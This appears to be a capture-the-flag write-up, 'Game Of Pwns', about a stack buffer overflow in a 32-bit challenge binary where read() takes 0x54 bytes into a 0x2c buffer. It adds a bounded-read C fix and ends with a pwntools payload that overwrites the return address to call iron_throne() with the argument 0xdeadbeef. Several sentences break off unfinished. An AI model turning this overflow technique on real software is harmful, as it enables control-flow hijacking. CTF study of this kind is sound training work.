Game Of Pwns
We are given a 32-bit binary.
Looking at the vuln() function:
There is scope for a buffer overflow here: the read() call accepts an input length (0x54) larger than the memory allocated for the buffer (0x2c).
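The fix for the mismatch described above is to take the read length from the destination buffer. The following is an added example, not code from the challenge binary: read_bounded() and demo_oversized_input() are hypothetical names, and the 0x54-byte input is constructed and fed through a pipe.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_LEN  0x2c   /* buffer size in vuln(), as stated in the write-up */
#define READ_LEN 0x54   /* length vuln() passes to read(), as stated in the write-up */

/* Pattern described in the write-up (kept as a comment, not compiled):
 *     char buf[BUF_LEN];
 *     read(0, buf, READ_LEN);   // 0x54 > 0x2c: 40 bytes can land past buf
 */

/* Hardened form: the caller passes the real size of the destination buffer. */
ssize_t read_bounded(int fd, char *dst, size_t dst_len)
{
    if (dst == NULL || dst_len == 0)
        return -1;
    ssize_t n = read(fd, dst, dst_len - 1);   /* keep one byte for the NUL */
    if (n < 0)
        return -1;
    dst[n] = '\0';
    return n;
}

/* Send READ_LEN bytes (constructed input) and return how many were stored.
 * Returns -2 if the guard bytes placed after the buffer were modified. */
int demo_oversized_input(void)
{
    struct { char buf[BUF_LEN]; unsigned char guard[8]; } frame;
    char input[READ_LEN];
    int fds[2];

    memset(input, 'a', sizeof input);
    memset(frame.guard, 0xC3, sizeof frame.guard);
    if (pipe(fds) != 0) return -1;
    if (write(fds[1], input, sizeof input) != (ssize_t)sizeof input) return -1;
    close(fds[1]);
    ssize_t n = read_bounded(fds[0], frame.buf, sizeof frame.buf);
    close(fds[0]);
    for (size_t i = 0; i < sizeof frame.guard; i++)
        if (frame.guard[i] != 0xC3) return -2;
    return (int)n;
}

int main(void)
{
    printf("stored %d of %d input bytes\n", demo_oversized_input(), READ_LEN);
    return 0;
}
```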
If we read the challenge description, it is pretty clear that we have to find the iron throne.
And while decompiling/debugging we see an
We see that iron_throne() is called with a parameter, which is later compared against the number -0x2152411, which translates as
And then we are supposed to get the flag with
Crafting the exploit
from pwn import *                                   # pwntools: provides ELF() and p32()
elf = ELF("./binary")                               # placeholder path; the write-up does not name the binary
payload = b'a'*44                                   # the required buffer
payload += b'x'*12                                  # padding required to reach the eip
payload += p32(elf.symbols["iron_throne"])          # adding the address of iron_throne()
payload += p32(0xdeadbeef)+p32(0xdeadbeef)          # the return address and the parameter of iron_throne()